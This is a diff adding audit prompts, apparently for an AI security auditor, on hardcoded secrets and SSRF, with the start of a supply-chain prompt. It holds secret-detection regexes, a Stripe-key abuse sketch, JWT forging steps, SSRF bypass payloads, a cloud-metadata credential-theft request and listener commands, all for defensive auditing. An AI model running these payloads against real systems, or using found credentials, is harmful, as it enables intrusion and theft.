+  literal Bearer, `mongoose.connect("mongodb://u:p@...")`, secrets in `next.
+  config.js`/`vite` defines that ship to the client, `NEXT_PUBLIC_*`/`VITE_*`
+  vars holding real secrets (these are bundled and public).
+- **Python:** `API_KEY = "..."`, `os.getenv("X", "fallback-secret")`,
+  `SECRET_KEY = "..."` (Django/Flask) literal, `boto3` `aws_access_key_id=
+  "AKIA..."`, `psycopg2.connect("postgresql://u:p@...")`, `stripe.api_key=`,
+  hardcoded `Authorization` in `requests` headers, `Fernet(b"hardcoded-key")`.
+- **Go:** `const apiKey = "..."`, `os.Getenv("X")` with `if x == "" { x =
+  "default" }`, `aws.Credentials{AccessKeyID:"AKIA...", SecretAccessKey:"..."}`,
+  DSN string literals `"user:pass@tcp(...)"`, `jwt` signing with a string-literal
+  key, `http.Request` with hardcoded bearer.
+- **PHP:** `define('DB_PASSWORD', '...')` / `wp-config.php`, `$apiKey = "..."`,
+  `getenv('X') ?: 'default'`, Laravel `config/*.php` returning literals instead of
+  `env()`, `.env` committed with `APP_KEY=`, PDO DSN with creds.
+- **Java/Kotlin:** `String API_KEY = "..."`, `application.properties`/`.yml`
+  `spring.datasource.password=...`, `new BasicAWSCredentials("AKIA...", "...")`,
+  `Jwts.builder().signWith(SignatureAlgorithm.HS256, "literal-secret")`,
+  keystore passwords inline, Android `BuildConfig`/`strings.xml` with API keys.
+- **Rust:** `const API_KEY: &str = "..."`, `env::var("X").unwrap_or("default")`,
+  reqwest `bearer_auth("literal")`, sqlx/`DATABASE_URL` literal with creds,
+  `jsonwebtoken` `EncodingKey::from_secret(b"literal")`.
+
+High-confidence provider fingerprints (verify liveness, don't flag blindly):
+`AKIA[0-9A-Z]{16}` (AWS access key), `sk_live_`/`rk_live_` (Stripe live),
+`xox[baprs]-` (Slack), `ghp_`/`gho_`/`github_pat_` (GitHub PAT), `AIza[0-9A-Za-z
+\-_]{35}` (Google API), `SG.` (SendGrid), `-----BEGIN (RSA|EC|OPENSSH|PGP) PRIVATE
+KEY-----`, `eyJ...` long-lived JWTs, `glpat-` (GitLab), `npm_` (npm token),
+`xapp-`/`xoxe` (Slack app), `key-[0-9a-f]{32}` (Mailgun), `dop_v1_` (DigitalOcean).
+
+## 3. Detection heuristics
+
+**Taint perspective.** This class is largely *presence-driven*, not flow-driven:
+the SOURCE is the attacker's read access to the repo/artifact, and the SINK is
+the embedded secret that grants access to an external resource. Frame each
+finding around **what the secret unlocks and who can read the secret.**
+
+- **SOURCE** = the attacker's read path to the literal: a public/forked repo, a
+  leaked or shared source tree, a published package (`npm pack`, `gem`, PyPI
+  sdist), a shipped client bundle/binary/mobile APK/desktop app, the CI logs, or
+  git history. Name the actual path ("repo is public", "value ships in the React
+  bundle served to all users", "old `.env` still in history at commit `abc123`").
+- **SINK** = the protected resource the secret authenticates to: the cloud
+  account (AWS/GCP), payment processor, email/SMS sender, third-party API quota,
+  the production DB, the app's own JWT/session/encryption that the secret signs,
+  or admin login via a default credential. State the concrete impact of holding
+  the secret.
+
+Vulnerable patterns to confirm (each needs a real secret + a real read path):
+
+- **Live third-party API key/token in code or config (CWE-798):** a usable
+  Stripe/AWS/Slack/SendGrid/Twilio/OpenAI/GitHub key as a literal. Highest value
+  when it's a *live secret* (not `test`/`pk_`/public) and the repo is reachable.
+  Confirm the prefix/format implies a live secret and the surrounding code uses
+  it against the real provider.
+- **Hardcoded password / connection string (CWE-259):** DB/SMTP/LDAP/Redis/MQ
+  credentials inline or in a committed config — `postgres://user:pass@host`,
+  `spring.datasource.password=...`, `DB_PASSWORD` literal. Reachable = the host
+  is network-reachable from where the attacker stands (often it is internally;
+  for a public repo of an internal app, still report — the creds are the leak).
+- **Hardcoded cryptographic / signing key (CWE-321):** the app's own JWT/session/
+  cookie/HMAC/encryption secret as a literal or framework default (`SECRET_KEY=
+  "django-insecure-..."`, `secret_key_base`, `signWith("secret")`). Holding it
+  lets an attacker forge tokens/cookies for any user → auth bypass. (When the
+  *crypto operation* is the bug, that's `crypto`; here the bug is the key being
+  knowable. Report under whichever the path centers on; cross-link in rationale.)
+- **Weak / default credential shipped (CWE-798/1392):** seeded `admin/admin`,
+  empty root password, `|| "changeme"` fallback that activates when the env var
+  is unset (and prod commonly leaves it unset), default framework secret used
+  when config is blank. Confirm the default path is *reachable in prod* — an
+  unset-env fallback that silently runs in production IS a finding.
+- **Secret in git history not rotated (CWE-798):** a key/`.env`/`.pem` deleted
+  from HEAD but present in history and never rotated at the provider. Removal ≠
+  rotation. Confirm via `git log -p`/`git rev-list --all -- <path>` that the
+  value is reachable and there's no evidence it was rotated.
+- **Server secret leaked to a client (CWE-798):** a secret meant for the server
+  that ends up in a browser/mobile/desktop bundle (`NEXT_PUBLIC_`/`VITE_`
+  prefixed real secret, key inlined in client JS, Android `strings.xml` API key).
+  Every user holds it. Distinguish from intentionally-public keys (publishable
+  Stripe `pk_`, Firebase web config, Google Maps browser key with referrer
+  restrictions — those are *designed* to be client-side, see §4).
+- **Committed private key / keystore (CWE-321):** any `-----BEGIN ... PRIVATE
+  KEY-----`, `*.p12`/`*.jks` with the password also committed, SSH host/deploy
+  keys, GCP service-account JSON. The private half being in the repo defeats it.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these holds:
+
+- **Not actually secret material:** a public/publishable key by design — Stripe
+  `pk_*` publishable key, Firebase web `apiKey` (it's an identifier, not a
+  secret; security is in rules), Google Maps/Analytics browser keys (restricted
+  by HTTP referrer/API), Sentry public DSN, OAuth *client_id* (public),
+  reCAPTCHA *site* key, public PGP/TLS *public* keys/certs. A `pk_`/`pub`/`site`/
+  `client_id` is not the secret half — verify which half you're looking at.
+- **Obvious placeholder / example / template:** `your-api-key-here`,
+  `xxx`/`<changeme>`, `sk_test_...` test-mode keys, values in `.env.example`/
+  `.env.sample`/`*.dist`/`*.template`/`README` snippets, RFC/docs example keys
+  (`AKIAIOSFODNN7EXAMPLE` is the canonical AWS docs sample — never live). Match
+  against known doc/example sentinels and obvious dummy patterns.
+- **Test fixtures / mocks / specs:** secrets confined to `test/`/`spec/`/
+  `__tests__/`/`fixtures/`/`*_test.*` that point only at a mock server or local
+  test container and are never the production value. Confirm no prod wiring uses
+  the same literal.
+- **Sourced from real secret management at runtime:** the literal you see is a
+  *variable read*, not a value — `ENV["X"]`/`os.getenv`/`process.env.X`/Vault/
+  KMS/SSM/Secrets Manager/Doppler/`credentials.yml.enc` (sealed) fetch. Reading
+  from a secret store is the correct pattern, not a finding. (A *fallback default*
+  on the read still IS a finding — see §3.)
+- **Already rotated / dead secret:** the value is demonstrably revoked (provider
+  returns 401, key deleted at source, commit message/ticket confirms rotation),
+  or it's a one-time-use value with no standing access. Removal from HEAD alone
+  is NOT rotation — only count as dead if the *provider-side* credential is gone.
+- **Low-entropy non-secret constants:** feature-flag strings, enum values, public
+  URLs, version strings, salts/IVs that are *meant* to be public (a salt stored
+  alongside a hash is by design not secret), cache keys — none are credentials.
+- **Encrypted-at-rest secret stores:** `credentials.yml.enc`, `git-crypt`/`sops`/
+  `ansible-vault`/`sealed-secrets` blobs where the *decryption key* is NOT also in
+  the repo. The encrypted blob is safe; only flag if the master key is committed
+  too.
+
+If a "mitigation" is bypassable — a fallback default that runs in prod, a "test"
+key that the README says to also use in staging, a sops file whose age key is
+committed two dirs over, a `pk_` that's actually the `sk_` mislabeled — it is NOT
+a mitigation. Flag it and name the exact bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — a **live secret granting broad/unauth, high-impact access** that
+  an attacker can read now: live AWS/GCP root or broad-IAM key, live payment
+  processor secret (`sk_live_`), production DB admin connection string,
+  committed private key controlling prod, or the app's JWT/session signing secret
+  (forge any user's auth) — when the repo/artifact is public or widely shared.
+- **High** — a live secret with meaningful but scoped access, or a default/weak
+  credential reachable in prod: scoped API token (single-service), SMTP/SendGrid
+  send key (spoof mail), internal DB creds in a leaked repo, a `|| "changeme"`
+  fallback that activates when prod leaves the env unset, server secret leaked
+  into a shipped client bundle.
+- **Medium** — secret with limited scope/short life or guarded reach: a key with
+  tight provider-side restrictions, creds for an isolated/non-prod system that's
+  still reachable, secret only in history of a private repo with limited
+  audience, default cred behind an extra auth layer.
+- **Low/Info** — placeholder/example/test-only value (usually drop per §4),
+  rotated/dead secret, or an intentionally-public key flagged by a scanner —
+  note for hygiene, do not put in the body.
+
+## 6. Emit findings as
+
+One JSON object per distinct secret (dedup the same value across files; list the
+locations in `rationale`). Fields:
+
+```json
+{
+  "id": "secrets-001",
+  "title": "Live Stripe secret key hardcoded in payment service — full account access",
+  "vuln_class": "secrets",
+  "owasp": "A02:2025",
+  "cwe": "CWE-798",
+  "asvs": "V14",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "src/services/billing.ts",
+  "line": 12,
+  "end_line": 12,
+  "code_excerpt": "const stripe = new Stripe(\"sk_live_51H...REDACTED...\");",
+  "source": "repo is public on GitHub (and the value also ships in the deployed source tree); any reader of the repo or a leaked checkout obtains the key",
+  "sink": "Stripe live secret API key — full read/write to the org's Stripe account: charges, refunds, customer PII, payout config",
+  "data_flow": "literal sk_live_ key -> Stripe client constructor -> used for live API calls in createCharge(). Key is the standing credential; reading the source = holding it. No env/Vault indirection on this assignment.",
+  "sanitizers_checked": "prefix is sk_live_ (live, not pk_ publishable nor sk_test_); not read from process.env (it's a literal); not in a test/fixture dir; not a documented example sentinel; no evidence of provider-side rotation in history or commit messages",
+  "rationale": "Genuine live secret, broadly scoped, in a reachable repo. Same key reused at src/jobs/reconcile.ts:8. Single root cause: the inlined key.",
+  "exploit_sketch": "Clone the repo, extract sk_live_..., call Stripe API (e.g. GET /v1/charges, POST /v1/refunds) with it — exfiltrate customer PII and issue refunds/charges, draining the account.",
+  "dynamic_poc_plan": "Against an isolated copy, issue a harmless authenticated Stripe call with the key (e.g. GET /v1/account) and show it returns 200 with the live account id — proving the key is live and usable. Do NOT mutate real data; a 200 on a read is sufficient proof.",
+  "proposed_fix": "The committed live key must be treated as compromised and stop being a standing credential in the repo: rotate it at the provider and move secret material out of source into a runtime-injected secrets store. Direction only — the exact rotation/history-purge/loading mechanics are left to the engineer who picks this up."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. State *who can read the secret and how* (`source`), *what the
+secret unlocks* with the concrete resource/impact (`sink`), how the literal
+becomes the standing credential (`data_flow`), and which §4 guard you confirmed
+absent — especially "is this actually the secret half / a live value / not a
+placeholder / not an env read" (`sanitizers_checked`). A string that merely
+*looks* high-entropy with no resource it unlocks and no read path is NOT a
+finding. Pick `cwe` by what the secret is: 798 generic API key/token/credential,
+259 a password, 321 a cryptographic/signing key, 547 a hard-coded sensitive
+constant used in a security decision. Use `status:"likely"` for a strong static
+trace (live-format secret + reachable path), `"confirmed"` only after a dynamic
+liveness check, `"triage"` when liveness or the read path is uncertain (e.g.
+unknown if the repo is public, or you can't tell test from prod value).
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the secret is **real, live, and grants access** — not just that a
+high-entropy string exists. Pick the oracle for the secret type; prefer
+read-only / non-destructive probes:
+
+1. **Third-party API key/token.** Make the provider's cheapest *authenticated
+   read* call with the key. **Observed proof** = AWS `sts get-caller-identity`
+   returns an account/ARN; Stripe `GET /v1/account` returns 200 + account id;
+   GitHub `GET /user` (or `/rate_limit` showing an authenticated quota) returns
+   the token's identity/scopes; SendGrid `GET /v3/scopes` lists send perms. A
+   200 with the account/identity proves the key is live and what it unlocks.
+   Never run destructive/mutating calls against real accounts.
+2. **DB / service connection string.** From an isolated network position that
+   matches the documented deployment, attempt a connect with the credentials
+   (read-only query like `SELECT 1`). **Observed proof** = the connection
+   succeeds / auth passes — proving the creds are valid. If the host isn't
+   reachable from the harness, fall back to confirming the format and that the
+   app itself uses these exact creds to connect at boot.
+3. **App's own signing/encryption secret.** Use the committed secret to forge an
+   artifact the running app must reject if the secret were unknown: sign a JWT /
+   session cookie / HMAC for a victim/admin identity with it, then send it to the
+   live app. **Observed proof** = the app accepts the forged token and returns
+   the victim's data / an authenticated session — auth bypass. (Overlaps `crypto`
+   §7 #5/#6; cite there if the operation is the bug.)
+4. **Default / weak credential.** Drive the live login/admin endpoint with the
+   default pair (`admin/admin`, seeded password, or the fallback that activates
+   when the env var is unset). **Observed proof** = authentication succeeds and
+   you reach a privileged area.
+5. **Secret in git history / client bundle.** Extract the value from history
+   (`git show <commit>:<path>`) or from the built client bundle, then run the
+   matching oracle above (1–4) to prove it's still live. **Observed proof** = the
+   recovered-from-history/bundle value passes the provider/app liveness check.
+
+Record the exact command and observed evidence in the `Repro` object
+(`reproduced`, `method:"live-exploit"`, `poc`, `observed`, `impact`). A
+read-only provider call returning the account/identity, or the live app
+accepting a forged token / default login, proves the class — set
+`method:"live-exploit"`. If the provider/app can't be reached, fall back to
+proving the value is a live-format secret and is wired into prod use (not a
+test/placeholder) and set `method:"static-poc"`. NEVER perform destructive,
+data-mutating, or billable actions against real third-party accounts to prove a
+finding — a read-only liveness check is sufficient and required.
diff --git a/plugins/security/prompts/finders/ssrf.md b/plugins/security/prompts/finders/ssrf.md
new file mode 100644
index 0000000..4ad4814
--- /dev/null
+++ b/plugins/security/prompts/finders/ssrf.md
@@ -0,0 +1,251 @@
+<!--
+FINDER PROMPT — ssrf. You are a fresh-context auditor hunting ONE class:
+Server-Side Request Forgery. Read the target's code; emit finding objects.
+Signal discipline (AGENTS.md) is binding: only a REACHABLE untrusted-input →
+network-fetch sink with no effective SSRF control on the path is a finding.
+No defense-in-depth musings, no dead code, no posture items.
+-->
+
+# Finder — Server-Side Request Forgery (ssrf)
+
+**Class key:** `ssrf` · **OWASP:** A01:2025 · **CWE:** CWE-918 · **ASVS:** V4
+
+## 1. Objective
+
+Find places where a server-side HTTP/network request targets a URL, host, or
+port that an untrusted caller can influence, such that the attacker can make the
+server reach internal hosts, cloud metadata, or arbitrary external endpoints.
+The bug is the server fetching an attacker-chosen destination — not what comes
+back.
+
+## 2. Where to look
+
+Entry points where a request param/body/header/webhook payload becomes (part of)
+a fetch target:
+
+- **Webhooks / callbacks:** user-registered `callback_url`, `webhook_url`,
+  `notify_url`, OAuth `redirect_uri` used server-side, Slack/Stripe-style event
+  callbacks the server POSTs to.
+- **URL-fetch features:** "import from URL", link unfurl/preview, OG/metadata
+  scrapers, RSS/feed fetchers, avatar/image proxies, PDF/HTML→render, file
+  upload "from URL", SSO metadata/JWKS/OIDC discovery fetched from a tenant-
+  supplied URL.
+- **Proxies / gateways:** `/proxy?url=`, `/fetch?target=`, image resizers,
+  health-check / reachability probes, "test connection" buttons for
+  user-configured integrations (DB hosts, S3 endpoints, SMTP, webhooks).
+- **Server-side rendering / parsers:** XML/SVG/HTML processors that follow
+  external entities or remote `<img>`/`<xsl>` references (XXE overlaps; flag the
+  outbound fetch).
+- **Cloud / infra glue:** code that reads `169.254.169.254`, `metadata.google
+  .internal`, `100.100.100.100` (Alibaba), or `fd00:ec2::254`; STS/IMDS token
+  fetchers whose base is configurable.
+
+Route/handler patterns to grep: params named `url`, `uri`, `link`, `src`,
+`target`, `dest`, `endpoint`, `host`, `callback`, `webhook`, `image`, `feed`,
+`redirect`, `next`, `return_to`, `domain`, `addr`, `proxy`.
+
+Per-language fetch/client signals:
+
+- **Crystal:** `HTTP::Client.get/post/exec`, `HTTP::Client.new(uri)`, `Crest`,
+  `Halite`.
+- **Ruby:** `Net::HTTP`, `open-uri` `URI.open`/`open(url)`, `Faraday`,
+  `HTTParty`, `RestClient`, `httprb`, `Excon`, `Down.download`,
+  `Mechanize`.
+- **Node/TS:** `fetch`, `axios`, `got`, `node-fetch`, `request`, `superagent`,
+  `undici.request`, `http(s).get/request`, `needle`.
+- **Python:** `requests.get/post`, `urllib.request.urlopen`, `httpx`,
+  `aiohttp.ClientSession.get`, `urllib3.PoolManager.request`, `pycurl`.
+- **Go:** `http.Get/Post`, `client.Do(req)`, `http.NewRequest`, `net.Dial`,
+  `(&http.Client{}).Get`.
+- **PHP:** `file_get_contents($url)`, `curl_exec` (after `curl_setopt
+  CURLOPT_URL`), `fopen($url)`, `Guzzle` `$client->request`, `fsockopen`.
+- **Java:** `new URL(s).openStream/openConnection`, `HttpClient.send`,
+  `HttpURLConnection`, `RestTemplate.getForObject`, `OkHttpClient`, `WebClient
+  .get().uri()`, `Jsoup.connect(url)`.
+- **Rust:** `reqwest::get`/`Client::get`, `hyper::Client`, `ureq::get`,
+  `isahc`, `surf`.
+
+## 3. Detection heuristics
+
+**Taint SOURCES** (untrusted): HTTP request query/body/path/header values, JSON
+fields, webhook registration data, multipart fields, message-queue payloads,
+DB rows that were originally user-set (stored SSRF), file uploads parsed for
+URLs (SVG/XML/HTML/Markdown), and `Location`/redirect targets the client/server
+follows.
+
+**Taint SINKS** (dangerous op): any of the fetch/client calls in §2 whose URL,
+scheme, host, or port derives from a source — including the **resolved IP**
+after a hostname check, and the **redirect target** an HTTP client auto-follows.
+
+Vulnerable patterns to confirm:
+
+- Source flows directly into a client call:
+  - Ruby: `Net::HTTP.get(URI(params[:url]))` / `URI.open(params[:url])`
+  - Node: `await axios.get(req.query.url)` / `fetch(req.body.callback)`
+  - Python: `requests.get(request.args["target"])`
+  - Go: `http.Get(r.URL.Query().Get("url"))`
+  - PHP: `file_get_contents($_GET['url'])` / `curl_setopt($c, CURLOPT_URL,
+    $_POST['u'])`
+  - Java: `new URL(req.getParameter("url")).openStream()` /
+    `restTemplate.getForObject(userUrl, String.class)`
+  - Crystal: `HTTP::Client.get(env.params.query["url"])`
+  - Rust: `reqwest::get(&payload.url).await`
+- **Host allowlist by string prefix/suffix** — bypassable:
+  `url.startsWith("https://api.internal")` (→ `https://api.internal.evil.com`),
+  `host.endsWith("trusted.com")` (→ `trusted.com.evil.com`),
+  `url.includes("trusted.com")` (→ `evil.com/?x=trusted.com`).
+- **Block-deny only** (deny `localhost`/`127.0.0.1` but allow everything else):
+  trivially bypassed via `0.0.0.0`, `0`, `127.1`, `[::1]`, `2130706433`
+  (decimal), `0x7f000001` (hex), `127.0.0.1.nip.io`, or any internal RFC1918
+  host the denylist forgot.
+- **Validate-then-fetch TOCTOU / DNS rebinding:** code resolves/validates the
+  hostname, then a *separate* client call re-resolves it. Attacker's DNS returns
+  a public IP at validation time, an internal IP at fetch time. Signal: the
+  validated value is the **hostname/URL string**, and the fetch does its own DNS
+  (the normal case for every HTTP client). Connecting by validated *IP* with
+  `Host` header preserved is the safe pattern.
+- **Redirect-following:** client validates the initial URL but follows 30x
+  redirects to an internal target (Node `redirect:'follow'` default, Python
+  `requests` `allow_redirects=True` default, Go default `CheckRedirect`,
+  curl `CURLOPT_FOLLOWLOCATION`). Flag if no per-hop revalidation.
+- **Scheme abuse:** no scheme allowlist → `file://`, `gopher://`, `dict://`,
+  `ftp://`, `ldap://`, `http://[::ffff:169.254.169.254]`. `gopher://`/`dict://`
+  enable raw TCP to internal services (Redis, etc.).
+- **Partial URL construction:** base is fixed but attacker controls the path/
+  host segment: `"https://" + userHost + "/api"`, or `URI.join(base,
+  userPath)` where `userPath` is an absolute URL/`//evil.com` and replaces the
+  host.
+
+## 4. Not-a-finding (false-positive guard) — check BEFORE flagging
+
+Do NOT report if any of these is present AND effective on the path:
+
+- **Closed allowlist of exact hosts** compared after parsing the URL (parse →
+  read `.host`/`.hostname` → exact-match against a fixed set), not substring/
+  prefix/suffix matching. Allowlisting the *registrable domain* via a real
+  parser is acceptable.
+- **Resolve-then-pin:** code resolves the hostname to an IP, rejects the request
+  if the IP is private/loopback/link-local/CGNAT/multicast/reserved (checks
+  `169.254.0.0/16`, `127.0.0.0/8`, `10/8`, `172.16/12`, `192.168/16`,
+  `100.64/10`, `::1`, `fc00::/7`, `fe80::/10`, `0.0.0.0/8`, IPv4-mapped IPv6),
+  **and then connects to that validated IP** (not re-resolving the name) — this
+  closes both IMDS and DNS-rebinding. A vetted SSRF-filter library counts:
+  Ruby `resolv`-based pin + `private_address_check`, Node `ssrf-req-filter`/
+  custom `lookup` pinning, Python `requests` with a pinned `HTTPAdapter`/socket
+  guard, Go `DialContext` with a `Control` hook rejecting private IPs, Java
+  custom `SocketFactory`/validating resolver.
+- **Redirects disabled or revalidated per hop:** `allow_redirects=False`,
+  `redirect:'manual'`, `CheckRedirect` returning `ErrUseLastResponse`,
+  `CURLOPT_FOLLOWLOCATION=0`, or a redirect handler that re-runs the IP pin on
+  every hop.
+- **Scheme allowlist** restricting to `http`/`https` (rejecting `file`,
+  `gopher`, `dict`, etc.) — necessary but not sufficient; still need host
+  control.
+- **No untrusted source on the path:** URL is a hardcoded constant, an
+  env/config value set by operators, or a fixed internal service base with only
+  a path appended that cannot escape the host (no leading `/`/`//`/scheme
+  injection). Constant IMDS fetches by the cloud SDK (no user input) are not
+  findings.
+- **Egress controlled at the network layer** in a way the code relies on:
+  outbound traffic forced through an authenticated forward proxy that itself
+  enforces the allowlist, or IMDSv2 hop-limit/PUT-token required and the code
+  never forwards user-controlled headers. Only credit this if verifiable in the
+  repo (proxy config, `no_proxy` rules); do not assume network controls.
+- **Egress is intentional & unprivileged by design:** e.g. a public link-preview
+  service explicitly documented as fetching arbitrary public URLs *and* it pins
+  away from internal ranges — then it is mitigated, report only if the pin is
+  missing/bypassable.
+
+If a guard exists but is bypassable (substring match, denylist-only, validate-
+then-re-resolve, redirects still followed), it is NOT a mitigation — flag it and
+name the bypass in `sanitizers_checked`.
+
+## 5. Severity guidance
+
+- **Critical** — unauthenticated reachable SSRF that can hit cloud metadata
+  (`169.254.169.254` / GCP `metadata.google.internal` / Azure IMDS) to steal
+  credentials, OR `gopher`/`dict`/raw-socket reach to an internal datastore
+  enabling RCE/full internal compromise. Attacker fully controls host+scheme.
+- **High** — authenticated or realistically-conditioned SSRF with broad internal
+  reach (arbitrary internal host:port, blind or full-response), or a webhook/
+  callback that reaches internal services; metadata blocked but internal network
+  exposed.
+- **Medium** — constrained SSRF: scheme locked to http/https and a partial
+  control (path-only, port-restricted, or a denylist that blocks the obvious
+  internal ranges but is bypass-prone), or blind SSRF with no useful response
+  oracle and limited internal exposure.
+- **Low/Info** — fetch of attacker URL where destination is provably limited to
+  public egress with effective internal-range pinning, leaving only minor info
+  leak (e.g. egress IP / SSRF-as-port-scan with no internal reach). Usually a
+  defense-in-depth note, not a body finding.
+
+Stored/second-order SSRF (tenant-configured webhook fetched later) keeps the
+severity of its reach; note the persistence in `rationale`.
+
+## 6. Emit findings as
+
+One JSON object per distinct root cause (dedup call sites; list extras in
+`rationale`). Fields:
+
+```json
+{
+  "id": "ssrf-001",
+  "title": "Unauthenticated URL-preview fetches attacker-controlled host (IMDS reachable)",
+  "vuln_class": "ssrf",
+  "owasp": "A01:2025",
+  "cwe": "CWE-918",
+  "asvs": "V4",
+  "severity": "critical",
+  "status": "likely",
+  "confidence": "high",
+  "file": "app/services/link_preview.rb",
+  "line": 42,
+  "end_line": 47,
+  "code_excerpt": "res = Net::HTTP.get(URI(params[:url]))",
+  "source": "params[:url] — unauthenticated POST /preview body, no auth filter on route",
+  "sink": "Net::HTTP.get(URI(...)) — server-side HTTP GET to caller-chosen host",
+  "data_flow": "params[:url] -> URI(params[:url]) -> Net::HTTP.get; no host/IP validation; HTTP client performs its own DNS so even a parse check would be rebindable",
+  "sanitizers_checked": "no scheme allowlist (file:// reachable); no host allowlist; no private-IP/IMDS denylist; redirects followed by default (Net::HTTP wrapper retries Location); 169.254.169.254 not blocked",
+  "rationale": "Reachable from unauth route; attacker sets url=http://169.254.169.254/latest/meta-data/iam/security-credentials/ to exfiltrate role creds via the rendered preview. Same sink at link_preview.rb:88 (RSS path).",
+  "exploit_sketch": "POST /preview {\"url\":\"http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>\"} -> response body echoes returned creds in the preview card.",
+  "dynamic_poc_plan": "Stand up a local listener and a fake-IMDS at 169.254.169.254 (or point url at the harness callback); send the request; confirm server connects to the chosen host and surfaces/relays the body.",
+  "proposed_fix": "Constrain the fetch so an untrusted caller can no longer choose an internal destination: validate the target against an SSRF-safe host/IP policy (no metadata/private ranges) and prevent redirect-based escape. High-level direction, not a patch — leave exact implementation to the engineer."
+}
+```
+
+Accuracy bar: `source`, `sink`, `data_flow`, and `sanitizers_checked` must be
+concrete and true. `data_flow` traces variables source→sink and names any guard
+encountered and why it fails. `sanitizers_checked` is the FP guard made
+explicit — list each §4 control and state it is absent or, if present, name the
+exact bypass. A finding without an untrusted source reaching a real fetch sink
+is not a finding. Use `status:"likely"` for a proven static trace, `"confirmed"`
+only after dynamic repro, `"triage"` if reachability/source is uncertain.
+
+## 7. Dynamic PoC strategy
+
+Goal: prove the running server makes a request to a destination the attacker
+chose. Two oracles, in order of preference:
+
+1. **Out-of-band callback (works for blind SSRF):** start a listener the auditor
+   controls (`python3 -m http.server`, `nc -lvnp`, or a unique webhook URL the
+   harness records). Send the request with the SSRF param pointed at it
+   (`url=http://<listener-host>:<port>/ssrf-<nonce>`). **Observed proof:** the
+   listener logs an inbound hit carrying the nonce, originating from the server.
+   Confirms server-initiated fetch of an attacker-chosen target.
+2. **Internal-reach / metadata oracle:** point the param at an internal target
+   the auditor stands up in the isolated worktree network — e.g. a stub HTTP
+   service on a private IP, or a fake-metadata endpoint bound to a private
+   address — and request a known path. **Observed proof:** the HTTP response (or
+   error timing/length for blind cases) reflects content only an internal-
+   reaching request could obtain (e.g. the stub's marker body, or a connect to
+   `127.0.0.1:<internal-port>` succeeding while a public bogus port is refused).
+
+Bypass checks to actually run when a guard exists: substring-allowlist evasion
+(`https://trusted.com.<listener>`), denylist evasion (`http://127.1`,
+`http://0`, decimal/hex IP, `http://[::1]`), DNS-rebinding (serve a TTL-0 name
+that flips public→private between validation and fetch), redirect bounce (point
+at `http://<listener>/r` that 302s to `http://169.254.169.254/...` and watch the
+second hop fire). Record the exact request and the observed evidence in the
+`Repro` object (`reproduced`, `method:"live-exploit"`, `poc`, `observed`,
+`impact`). If only OOB confirmation is possible, that still proves SSRF — set
+`method:"live-exploit"` and note blindness in `notes`.
diff --git a/plugins/security/prompts/finders/supply-chain.md b/plugins/security/prompts/finders/supply-chain.md
new file mode 100644
index 0000000..fc5b53d
--- /dev/null
+++ b/plugins/security/prompts/finders/supply-chain.md
@@ -0,0 +1,371 @@
+<!--
+FINDER PROMPT — supply-chain. You are a fresh-context auditor hunting ONE class:
+Software Supply Chain & CI/CD Failures. Read the target's dependency manifests,
+lockfiles, CI/CD workflows, and install scripts; emit finding objects. Signal
+discipline (AGENTS.md) is binding: only a REACHABLE path from an untrusted origin
+(a malicious PR/fork, a compromised/typosquatted dependency, an attacker-published
+package version) to a dangerous sink (code execution in CI with secrets/write
+token, code execution at install time, or a known-exploitable vuln in a code path
+the app actually reaches) — with no effective guard — is a finding. Posture/process
+items (missing SBOM, no SECURITY.md, no Dependabot, low maintainership, missing
+pinning *as hygiene*) go to the Info appendix, NOT the body. No "upgrade everything"
+churn, no CVEs in dev-only/unreached code reported as High, no dead workflows.
+-->
+
+# Finder — Software Supply Chain & CI/CD (`supply-chain`)
+
+**Class key:** `supply-chain` · **OWASP:** A03:2025 (Software Supply Chain Failures) · **CWE:** CWE-1104 (use of unmaintained third-party components) / CWE-1357 (reliance on insufficiently trustworthy component) / CWE-829 (inclusion of functionality from untrusted control sphere) / CWE-506 (embedded malicious code) · **ASVS:** V15 (Secure Coding & Architecture — dependency & build integrity)
+
+## 1. Objective
+
+Find the path by which untrusted code or untrusted input enters the build/CI or the
+shipped artifact and reaches a privileged sink: a dangerous workflow trigger that runs
+attacker-controlled code with repo secrets / a write-scoped `GITHUB_TOKEN`, a `${{ }}`
+expression injected into a shell, an over-broad token, an unpinned/typosquattable
+dependency or Action, a malicious or attacker-overridable lifecycle/install script, or
+a *known-exploitable* dependency CVE that the app's own code actually invokes. The bug
+is a real CI-execution-with-secrets or install-time-RCE or reachable-vuln path — not the
+mere absence of pinning, an SBOM, or a security policy.
+
+## 2. Where to look
+
+Four surfaces: (A) CI/CD workflow definitions, (B) dependency manifests + lockfiles,
+(C) lifecycle/install/build scripts, (D) the integrity of how artifacts are fetched.
+
+- **CI/CD workflows:** `.github/workflows/*.yml|*.yaml`, composite/reusable actions
+  (`action.yml`), `.gitlab-ci.yml`, `Jenkinsfile`, `.circleci/config.yml`,
+  `azure-pipelines.yml`, `.drone.yml`, `bitbucket-pipelines.yml`, Forgejo/Gitea
+  `.forgejo/workflows/*`/`.gitea/workflows/*` (same `${{ }}` + action model as GHA),
+  `Taskfile`/`Makefile`/`Rakefile` targets invoked by CI.
+- **Dependency manifests + lockfiles** (presence of a lockfile is what makes a
+  known-vuln/pinning claim checkable):
+  - **Node/TS:** `package.json` (`dependencies`, `devDependencies`, `scripts`,
+    `resolutions`/`overrides`), `package-lock.json`, `yarn.lock`, `pnpm-lock.yaml`,
+    `.npmrc`.
+  - **Python:** `requirements*.txt`, `pyproject.toml` (`[project.dependencies]`,
+    `[tool.poetry]`), `Pipfile`/`Pipfile.lock`, `poetry.lock`, `setup.py`/`setup.cfg`.
+  - **Ruby:** `Gemfile`, `Gemfile.lock`, `*.gemspec`.
+  - **Crystal:** `shard.yml`, `shard.lock` (git deps via `github:`/`git:` + `branch:`/
+    `commit:`; a floating branch is unpinned).
+  - **Go:** `go.mod`, `go.sum` (`replace` directives pointing at forks/local paths),
+    `vendor/`.
+  - **PHP:** `composer.json`, `composer.lock`.
+  - **Java/Kotlin:** `pom.xml`, `build.gradle(.kts)`, `gradle/libs.versions.toml`,
+    `settings.gradle` (custom/insecure repositories).
+  - **Rust:** `Cargo.toml`, `Cargo.lock`, `[patch]`/`[replace]`, `build.rs`.
